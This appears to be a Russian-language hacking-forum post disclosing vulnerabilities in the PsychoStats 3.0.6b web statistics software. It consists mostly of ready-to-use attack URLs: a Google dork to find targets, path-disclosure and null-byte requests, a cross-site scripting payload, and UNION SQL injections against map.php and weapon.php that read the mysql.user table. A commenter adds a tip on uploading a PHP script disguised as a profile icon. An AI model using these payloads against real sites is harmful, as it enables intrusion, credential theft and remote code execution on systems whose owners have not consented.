PsychoStats
Google d0rk: "Powered by PsychoStats"
[Full-disclosure] PsychoStats 3.0.6b and prior
http://PsychoStats/includes/smarty/Smarty.class.php
http://PsychoStats/server.php?newcss=styles.css&newtheme=%00
PsychoStats v3.0.6b Multiple Cross-Site Scripting Vulnerabilities
http://PsychoStats/weapons.php/%3E%22%3E%3Cscript%3Ealert(1%20%20)%3C/script%3E
ранее была ксс в логине
[SQL-injection]
Удалённый пользоваель может выполнить произвольный SQL-запрос.
Уязвимости существуют из-за:
отсутствия проверки параметра id в скрипте map.php
отсутствия проверки параметра id в скрипте weapon.php
Пример использования:
http://PsychoStats/map.php?id=3+limit+0+union+select+1,1,1,111111111, 1,1,1,1,1,1,1,2222222,1,1,1,1,1+from+mysql.user/*
http://PsychoStats/weapon.php?id=20+limit+0+union+select+1,1,1,1,1,22 22222,1,1,1,1,1,1,1,11111111,1,1,1,1,1/*
p.s. ранее выкладывалось на ачате по кмс
https://forum.antichat.ru/showpost.php?p=464066&postcount=3159
http://video.antichat.ru/file250.html
з.з.ы. более ранние версии не рассматривались
Сообщение от
m0nzt3r
Там еще можно иконку заливать в профиле (Хотя я не везде видел).Так вот, вместо нее заливаем пхп скрипт ) Только не помню, называем 1.ico.php - так кажется
m0nzt3r 3.0.7б это